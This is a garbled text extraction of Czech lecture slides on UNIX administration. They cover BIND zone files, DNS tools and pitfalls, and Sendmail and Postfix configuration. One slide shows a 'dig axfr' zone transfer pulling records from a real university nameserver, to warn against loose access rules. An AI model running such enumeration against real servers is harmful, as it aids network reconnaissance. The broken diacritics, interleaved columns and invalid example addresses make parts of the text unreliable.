SOA - cˇ asovaˇce ˇ Refresh sekundáry v tomto intervalu sledují zmeny na primáru Retry za jak dlouho zkouší sekundár kontaktovat primár, který neodpovídá ˇ záznamu˚ Expire doba vedoucí k nezplatnení (nadále nejsou autoritativní) ˇ nekolik ˇ MinTTL melo rozdílných významu˚ 1 minimální TTL všech RR (odmítnuto praxí) 2 default TTL pro RR bez TTL (vhodné jen pro primáry) 3 ˇ (“pozitivní”: TTL negativních odpovedí direktiva TTL)
Doporuˇcené nastavení koˇrenové servery 8h-2h-30d-4d ˇ bežné servery 8h-2h-7d-1d
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace DNS (zóny)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.lg.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1 ; lg.com. IN NS ns1.lg.com. IN NS ns2 ; klasické Aˇ cko ns1 IN A 192.168.300.3 ns2 IN A 192.168.300.4
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace DNS (zóny)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.cp.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1.cp.com. IN NS ns2.nˇ ekde.cz. ; tohle není naše vˇ ec!! ;ns1.cp.com. IN A 192.168.300.3 ;ns2.nˇ ekde.cz. IN A 192.168.300.4
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace DNS (zóny)
Administrace UNIXu Leo Galamboš ˇ Smerování
$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.lg.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1 IN NS ns2 ns1 IN A 192.168.300.3 ns2 IN A 192.168.300.4 www IN A 192.168.300.5
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
out ns3.out
IN IN IN
NS NS A
ns3.out.lg.com. ns2.lg.com. 192.168.300.6 ; GLUE!
Administrace UNIXu
Verze
Leo Galamboš
ˇ verze BIND (Berkeley Internet Name Nejpoužívanejší Domain): 4.X starší verze: obtíže s multihomed 8.X/9.X multihomed, rozumná ACL pro pˇrístup ke službám DNS
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
DNS u jednotlivých záznamu˚ uvádí cˇ as — 4.X pouze v sekundách. BIND9 už rozumí zkratkám za cˇ ísly: #s sekundy
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
#m minuty #h hodiny #d dny #w týdny
Praxe
Cviˇcení
Signály
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
HUP znovunaˇctení báze záznamu˚ INT uložení interní DB BINDu do named_dump.db
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu
WINCH zapne/vypne logování všech dotazu˚ pˇres syslog ABRT/ILL vypsání statistik do named.stats (ABRT – v4, ILL – v8) USR1/USR2 zapnutí a vypnutí debug režimu TERM uloží dynamické zóny do souboru˚ (v8)
Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace BIND
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
poˇcet transferu˚ zón (dovnitˇr i ven)
Zpracování zpráv systému
velikost datových bloku˚
Domain Name System
velikost zásobníku
Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
poˇcet otevˇrených souboru˚ interval cˇ ištení keše ˇ interval kontroly adaptéru˚ (dynamické zmeny up/down, dhcp. . . ) interval tisku statistiky
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Alternativy
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
djbdns: bez DNSSEC, TSIG a IPv6
Domain Name System
dnsmasq: pro SOHO routery
Zóny a domény
MS DNS: postrádá pˇrístupová ACL a split horizon
Módy dotazu˚ do DNS
Co je potˇreba pro zónu
Name servery Konfigurace serveru
PowerDNS: nepohodlná podpora DNSSEC, TSIG a split horizon Unbound: postrádá split horizon
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
nslookup
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
Starší zpusob ˚ pokládání dotazu˚ do DNS serveru.
Domain Name System
nslookup -type=NS cuni.cz alfik.ms.mff.cuni.cz
Zóny a domény
nslookup -type=A www.cuni.cz
Konfigurace serveru
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery
BIND implementace Klientské utility
nslookup -norecursive -type=NS egothor.org alfik.ms.mff.cuni.cz
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
dig
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
ˇ diagnostika než nslookup(1). Kvalitnejší
Domain Name System Zóny a domény
dig @192.168.4.98 . NS
Co je potˇreba pro zónu Módy dotazu˚ do DNS
dig @198.41.0.4 . NS
Name servery Konfigurace serveru BIND implementace
dig @alfik.ms.mff.cuni.cz ms.mff.cuni.cz axfr
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Pˇrevod IP→hostname
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
1
A.B.C.D se pˇrevede na D.C.B.A.in-addr.arpa
2
v DNS se hledá PTR záznam pro D.C.B.A.in-addr.arpa
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery
Jak se deleguje? Kdyby všechny síteˇ byly A.B.C.D/N s N = 8, 16, 24, tak je možné delegovat “na místeˇ teˇcky”. U adres typu A.B.C.D/27 si musíme pomáhat fintou.
Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Delegování podsíteˇ v in-addr.arpa
Administrace UNIXu Leo Galamboš ˇ Smerování
$ORIGIN 0.127.in-addr.arpa. 33 CNAME 33.32/27 34 CNAME 34.32/27 : 62 CNAME 62.32/27
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
32/27 NS
ns.somewhere.out.
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Konzervativní syntax Lomítko není korektní znak v hostname, proto se ˇ nahrazuje nejakým povoleným znakem (typicky pomlˇckou).
Cviˇcení
Efektivní transfery zóny
Administrace UNIXu Leo Galamboš
options { // default transfer-format many-answers; };
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény
server 12.266.48.32 { // MS-Windows transfer-format one-answer; }
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
many-answers umí jen BIND9/8, pozdní cˇ tyˇrka one-answer je tˇreba pro komunikaci se staršími BINDy (nebo i MS-Windows)
Dynamický update
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
zone "egothor.org" { type master; file "pri/egothor.org"; allow-update { 127.0.0.1; }; };
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Podrobnosti nsupdate(8)
Cviˇcení
NOTIFY k sekundárum ˚
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
zone "egothor.org" { type master; file "pri/egothor.org"; notify yes; also-notify 129.34.20.80; };
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Pˇríliš volné ACL
Administrace UNIXu Leo Galamboš ˇ Smerování
Pˇríklad: transfery zón z IP adres, které nejsou našimi sekundáry. Filosoficky je to správneˇ (DNS záznamy jsou ˇ public), prakticky to muže ˚ prozradit strukturu síte. # dig @195.113.20.71 -t axfr ms.mff.cuni.cz ; <<>> DiG 9.2.5 <<>> @195.113.20.71 -t axfr ms.mff.cuni.cz ; (1 server found) ;; global options: printcmd ms.mff.cuni.cz. 28800 IN SOA ns.ms.mff.cuni.cz. hostmaster.ms.mff.cuni.cz. 2005101802 28800 14400 2419200 86400 ms.mff.cuni.cz. 28800 IN NS ns.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS sns.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS ns.kolej.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS golias.ruk.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 20 smtp1.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 20 smtp2.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 40 smtp1.kolej.mff.cuni.cz. : :
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Kešování
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Kešují se nejen záznamy týkající se vlastního požadavku, ale i odkazy na autoritativní NS.
Zpracování zpráv systému Domain Name System Zóny a domény
ˇ ˇ (od vetšina NS kešuje pozitivní odpovedi autoritativních zdroju) ˚ ˇ ⇒ opatrneˇ BIND 4.9/8/9 kešuje i negativní odpovedi s TTL záznamu˚
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
ˇ — bývalo natvrdo 10 minut. TTL negativních odpovedí
Praxe
Cviˇcení
Glue
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Pozor Nevkládejte do zón chybné nebo duplicitní glue záznamy!
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
glue je potˇreba pouze když je NS v téže doméneˇ a ješteˇ není odpovídající A-záznam ˇ nekteré kompilace BIND hlásí chybné glue, ale poslední standard-branch nikoliv ⇒ dávejte pozor sami
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
dot-bouda
Leo Galamboš ˇ Smerování ˇ Statické smerování
Položka neukonˇcená teˇckou dostává suffix $ORIGIN: mail mail2
MX 10 MX 10
relay.isp.out. relay2.isp.out
Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
znamená totéž co ($ORIGIN = mydomain.in)
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
mail mail2
MX 10 MX 10
relay.isp.out. relay2.isp.out.mydomain.in.
Typické pasti a chyby Praxe
Cviˇcení
Zamet’te si vlastní smetí ˇ pˇricházet zbyteˇcné Na koˇrenové servery by nemely ˇ sloužit jako žádosti, proto by každý nameserver mel primár pro: 0.in-addr.arpa 255.in-addr.arpa 0.0.127.in-addr.arpa ˇ být Staˇcí pokrýt SOA a NS, u localhost revers by mel ješteˇ záznam:
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
1
PTR
localhost.
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Není dobré pˇripustit k localhost ješteˇ lokální doménu, protože: localhost je všude v “poˇrádku” ˇ pˇreklad 127.0.0.1 na localhost.mydomain a zpet vede cˇ asto pˇres DNS, prostý localhost. se zpracuje pˇres lokální tabulky /etc/hosts
Cviˇcení
Kontrola
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
1
SOA a cˇ asovaˇce
2
Glue je v poˇrádku
3
MX záznamy
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery
4
sekundáry pracují
Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Problém: chybný SOA serial
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
souˇcasný SOA serial je menší než správný — staˇcí nastavit na primáru správný a inicializovat reload (SIGHUP)
Zpracování zpráv systému Domain Name System Zóny a domény
ˇ než správný souˇcasný SOA serial je jen o málo vetší — necháme to být ˇ než správný — souˇcasný SOA serial je o hodneˇ vetší pˇretoˇcíme SOA serial pˇres 31. bit 1 2
3
31
2014023101 → 2014023101 + 2 − 1 = 4161506748 reload primáru, sekundáry si musí stáhnout nové zóny 4161506748 → 2004022101
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Nameservery
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
alesponˇ 2 - ochrana proti výpadku
Zpracování zpráv systému
alesponˇ jeden v každé (pod)síti - eliminace problému˚ ˇ se smerovaˇ cem
Domain Name System Zóny a domény Co je potˇreba pro zónu
ˇ poblíž vetších stroju, ˚ ne nutneˇ na nich - generují ˇ nejvetší poˇcet DNS dotazu˚
Módy dotazu˚ do DNS
homogenní O/S prostˇredí DNS - zjednodušuje správu i analýzu chyb
Klientské utility
Name servery Konfigurace serveru BIND implementace Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
ˇ bezpeˇcnost: DNS server (a zejména primár) by mel být na dedikovaném stroji
Cviˇcení
Plánování kapacity
Administrace UNIXu Leo Galamboš
Jak poznám, že je muj ˚ DNS server pˇretížený? ˇ procesu named velikost pameti nebezpeˇcí swapování velké NS pomalu startují ˇ (napˇr. pˇri transferech zón) velké NS se pomalu delí
ˇ CPU - mela ˇ by být velmi malá (ˇrádoveˇ jednotky zátež procent) analýza: pohled do statistik BINDu42 v4: ABRT signal v9: rndc stats
parametry v named.conf, blok options statistics-interval: globální pˇrehled o poˇctech dotazu, ˚ rekurzí, chyb. . . ˇ host-statistics: hledání puvodc ˚ u˚ záteže
42
bindgraph – postavený na RRDtool
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
ˇ správné smerování ˇ zajistete mezi svými stanicemi
Domain Name System
spust’te BIND — pozor na OpenBSD a jeho syslogd
Zóny a domény
zaregistrujte si svoji doménu 1. ˇrádu (u cviˇcícího)
Módy dotazu˚ do DNS
Co je potˇreba pro zónu
Name servery Konfigurace serveru
nastavte si primár s alesponˇ jedním A-záznamem ˇ rte si navzájem že tento záznam mohou oveˇ resolvovat i ostatní
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
rozjed’te sekundár pro cizí zónu na vašem NS delegujte cˇ ást své domény ˇ v zónách a jejich replikace na vyzkoušejte si zmeny sekundáry
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace
vyzkoušejte si ˇrešení chybného SOA serial pˇretoˇcením pˇres 31. bit ˇ ete ˇ vlastní správu koˇrenové zóny (*) rozbehn
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
ˇ Cást IV Základy poštovního subsystému
Boj proti SPAMu
Cviˇcení
Program
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
22
E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
23
Cviˇcení
Cviˇcení
E-mailový subsystém
Administrace UNIXu Leo Galamboš E-mail Volba MTA
Komponenty MUA Mail User Agent – rozhraní mezi uživatelem a subsystémem Mozilla, Lotus Notes, Pegasus, Eudora ˇ MTA Mail Transport Agent – smeruje/doruˇ cuje poštu mezi uzly SMTP; Sendmail, QMail, Postfix MDA Mail Delivery Agent – doruˇcuje na správné místo v rámci lokálního stroje mh – e-maily v extra souborech, mbox – vše v jednom souboru
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Schéma modulu˚
Leo Galamboš E-mail Volba MTA Sendmail
MUA
Postfix Boj proti SPAMu
MDA
Síť
MTA
MTA
MTA
Cviˇcení
Administrace UNIXu
MTA
Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Sendmail: je všude 2× pomalejší než postfix ˇ ejší ˇ (urˇcité pozitivum muže zdaleka nejderav ˚ být sendmail X)
Postfix: z dílny IBM a další: QMail, Exim, Lotus Notes, Exchange. . .
MDA, formát úložišteˇ
Administrace UNIXu Leo Galamboš E-mail Volba MTA
mbox
Sendmail Postfix Boj proti SPAMu
nové e-maily se pˇripojují na konec souboru/schránky uživatele problém se zamykaním, zejména na sít’ových svazcích rychlé vyhodnocování regulárních dotazu˚ nad veškerou došlou poštou
mh/maildir nové e-maily alokují vždy nový soubor v adresáˇri/schránce uživatele podporuje složky v rámci schránky podporuje sdílení složek mezi více uživateli
Cviˇcení
Maildir formát
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
adresáˇre cur, new, tmp nový e-mail: vytvoˇrení unikátního souboru v tmp, pˇresun do new po pˇríjmu zprávy pˇresun z new do cur
Odpovídající strukturu vytváˇrí napˇr. makemaildir(1) (dovecot).
Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Sucks-Rules-O-Meter
Leo Galamboš
Produkt qmail exim sendmail postfix
Sucks + Sux 165 107 278 265
Rocks + Rox 758 495 1532 1620
Index 4.594 4.626 5.511 6.113
ˇ ˇ rení” kvality “nevedecké meˇ Windows × Unix (http://srom.zgp.org/) 47, 6 310, 8 × 312 193 ˇ je Unix vítez
E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Sendmail (Eric Allman)
Leo Galamboš E-mail Volba MTA
1979 deliverman BSD 4.0
Sendmail Postfix Boj proti SPAMu
1983 sendmail BSD 4.1c
Cviˇcení
1998 Sendmail Inc. Konfigurace obsahuje pˇrepisovací pravidla pro parsování e-mailu˚ a volbu správných MTA cˇ i MDA pro další doruˇcování. Konfigurace se píše v makro jazyce, po kompilaci m4(P) vzniká použitelný a pro laiky zcela nepˇrehledný konfiguraˇcní soubor sendmail.cf: SCanonify2=96 R$* < @ localhost > $* R$* < @ localhost . $m > $* R$* < @ localhost . UUCP > $*
$: $1 < @ $j . > $2 $: $1 < @ $j . > $2 $: $1 < @ $j . > $2
M4 macro processor
Administrace UNIXu Leo Galamboš E-mail Volba MTA
ˇ proudove-orientovaný (nedetekuje ˇrádky, pouze cˇ te proud dat) ignorování za konec ˇrádky: dnl definice makra: define(‘WWW’,‘www.nic.cz’)
Opatrneˇ s nevinnými konstrukcemi define(‘SMART_HOST’, ‘central-relay.firma.cz’) FEATURE(‘use_cw_file’) dnl Tohle je opravdu poznamka # ale odkaz na FEATURE(‘use_cw_file’) bude expandován i tady
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Pˇrepisovací pravidla
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
konfiguraˇcní soubor definuje skupiny pˇrepisovacích pravidel, tzv. rulesets pravidla: zpracují adresy z hlaviˇcky normalizují je urˇcí jak dopis zpracovat (smtp, relay, local)
pravidla odpovídají gramatice, která pracuje nad tokeny (nikoliv samostatnými znaky!)
Cviˇcení
Užiteˇcná makra/konstanty
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
$j FQDN serveru $m domainname serveru $w hostname serveru
Levá strana pravidel (LSP)
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
$@ "prázdno" $* žádný nebo více tokenu˚ $+ alesponˇ jeden token $- práveˇ jeden token
Pˇríklad
Administrace UNIXu Leo Galamboš E-mail Volba MTA
$* < $+ >
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Shoda s Josef Novak < [email protected] > < [email protected] >
Není shoda s Josef Novak <> Josef Novak <>
Pravá strana pravidel (RSP)
Administrace UNIXu Leo Galamboš
$n n-tý výraz v LSP
E-mail Volba MTA
$>n zbytek ˇrádku bude parsován a pˇredán skupineˇ pravidel n k vyhodnocení; výstup z "podprogramu"je pak výstupem tohoto pravidla $#M $@H $:U cíl, napˇr. smtp/mail.firma.cz/josef ˇ dokud Pˇrepisovací pravidlo je aplikováno opakovane, ˇ nastává pˇríslušná shoda. Zmena tohoto standardního pˇrístupu je skrze: $@ skupina pravidel je ukonˇcena a výsledek je zustatek ˚ na RSP $: neukonˇcuje zpracování ve skupineˇ pravidel, ale jen v daném pravidle
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Skupiny pravidel
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
0 urˇcí trojici mailer, host, user
Boj proti SPAMu
Cviˇcení
1 aplikováno na adresy odesílatelu˚ 2 aplikováno na adresy pˇríjemcu˚ 3 preprocess všech adres 43 4 postprocess všech adres 44 5 pˇrepisuje nealiasované lokální uživatele
43
pˇrevod na obecný vnitˇrní formát, napˇr. user < @ host . domain . > 44 revertuje vnitˇrní formát, napˇr. [email protected]
Administrace UNIXu
Forma zápisu
Leo Galamboš E-mail Volba MTA Sendmail
Sm Rlsp rsp R..... R.....
Postfix Boj proti SPAMu
volitelná poznámka
Sn R..... R.....
Syntaxe ˇ Položky na R-ˇrádcích oddeluje tabulátor!
Cviˇcení
Pˇríklad modifikace pravidel
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
define(‘SMART_HOST’, ‘.........’) # pred smart-host resolving v ruleset0 LOCAL_NET_CONFIG # lokalni postu posilej primo, ostatni (mozna) via smart host R$* < @ $* .$m. > $* $#smtp $@ $2.$m. $: $1 < @ $2.$m. > $3
Administrace UNIXu
Klasický tok pˇres skupiny pravidel
Leo Galamboš
pˇríjemci jsou analyzováni skupinou 3 − 0 (vznikne doruˇcovací trojice) adresy pˇríjemcu˚ zpracuje skupina 3 − 2 − R = adresy odesílatelu˚ zpracuje skupina 3 − 1 − S = n − 446
Msmtp, P=[IPC], F=mDFMuX, S=EnvFromSMTP/HdrFromSMTP, R=EnvToSMTP, E=\r\n, L=990, T=DNS/RFC822/SMTP, A=TCP $h
45 46
R = n diktuje doruˇcovací agent, 0=nedef S = n diktuje doruˇcovací agent, 0=nedef
n − 445
E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Testování pravidel
Leo Galamboš E-mail Volba MTA
root@fw:2772:~# /usr/libexec/sendmail/sendmail -Ctest.cf ADDRESS TEST MODE (ruleset 3 NOT automatically invoked) Enter > 3,0 [email protected] canonify input: galambos @ egothor . org Canonify2 input: galambos < @ egothor . org > Canonify2 returns: galambos < @ egothor . org . > canonify returns: galambos < @ egothor . org . > parse input: galambos < @ egothor . org . > Parse0 input: galambos < @ egothor . org . > Parse0 returns: galambos < @ egothor . org . > ParseLocal input: galambos < @ egothor . org . > ParseLocal returns: galambos < @ egothor . org . > Parse1 input: galambos < @ egothor . org . > Mailertable input: < egothor . org > galambos < @ Mailertable input: egothor . < org > galambos < @ Mailertable returns: galambos < @ egothor . org . > Mailertable returns: galambos < @ egothor . org . > MailerToTriple input: < > galambos < @ egothor . org MailerToTriple returns: galambos < @ egothor . org . > Parse1 returns: $# esmtp $@ egothor . org . $: parse returns: $# esmtp $@ egothor . org . $:
-bt
Sendmail Postfix Boj proti SPAMu
Cviˇcení
egothor . org . > egothor . org . >
. > galambos < @ egothor . org . > galambos < @ egothor . org . >
Zkuste i sendmail -Ctest.cf -d21.12 -bt
ˇ sendmail parametru˚ Zjištení
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
root@fw:2776:~# /usr/libexec/sendmail/sendmail -d0
Cviˇcení
Administrace UNIXu
Blokování pošty
Leo Galamboš E-mail
Tento pˇríklad vyžaduje podporu MAP_REGEX v sendmail-u!
Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
LOCAL_CONFIG Kkoreatea regex -m text/html[; ]*charset="?(iso-2022-kr|euc-kr) LOCAL_RULESETS HContent-Type: $>Block_charset SBlock_charset R$* $: $(koreatea $1 $: $) R $@ OK R$+ $#error $: 599 Poslete mi to cesky
Administrace UNIXu
Správa sendmail-u
Leo Galamboš E-mail Volba MTA
mailq(1) - obsah
front47
runq(1) - zpracování front48 mailstats(8) - statistika pˇrenosu˚ (per mailer) hoststat(8) - statistika transferu (per host)49 purgestat(8) - anulování statistik per host50 newaliases(1) - aktualizace báze aliasu˚ 51
47
sendmail sendmail 49 sendmail 50 sendmail 51 sendmail 48
-bp -q -bh -bH -bi
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Praktická doporuˇcení
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
ˇ být volneˇ pˇrístupný bežným ˇ soubor s aliasy by nemel uživatelum ˚ ˇ pˇresmerujte poštu pro systémové uživatele (root, operator, www) na svuj ˚ úˇcet ˇ eˇ textové podoby báze aliasu˚ 52 po každé zmen spust’te newaliases(1) ˇ rte, že jste omylem nenakonfigurovali open-relay! oveˇ
52
Typicky /etc/aliases nebo /etc/mail/aliases
Cviˇcení
Postfix
Administrace UNIXu Leo Galamboš
1997 VMailer 1998 Secure Mailer (IBM)
E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
1999 Postfix ˇ Obsahuje malé procesy s malou potˇrebou na oprávnení root-a. Základní konfigurace je v main.cf: mydomain – jméno lokální domény myorigin – na jakou doménu se maškaráduje lokálneˇ odesílaná pošta mydestination – pro jaké domény pˇrijímáme poštu relayhost – (opt) náš relay host Reload konfigurace: postfix reload – více viz postfix(1).
Cviˇcení
Administrace UNIXu
Postfix: Schéma konfigurace
Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
From: [email protected] To: [email protected] mynetworks=clientzone relayhost=CD
@mff.cuni.cz MX 10 smtp1 MX 20 fake MX 30 smtp3
Cviˇcení mydestination=mff.cuni.cz
smtp3 clientzone
Internet
relaydept CD
mynetworks=relaydept myorigin=priklad.cz masquerade_domains=priklad.cz From: [email protected] To: [email protected]
mydestination=mff.cuni.cz smtp1
fake
relay_domains=mff.cuni.cz
Správa postfix-u
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
postfix(1) - start/stop/check/flush/reload/status postalias(1) - nahrazuje newaliases(1) postcat(1) - zobrazuje obsah front postconf(1) - správa main.cf postmap(1) - stavba/správa pomocných tabulek, napˇr. canonical, virtual postqueue(1) - tisk obsahu nebo vyvolání zpracování fronty
Boj proti SPAMu
Cviˇcení
ˇ Eliminace nechtené pošty
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
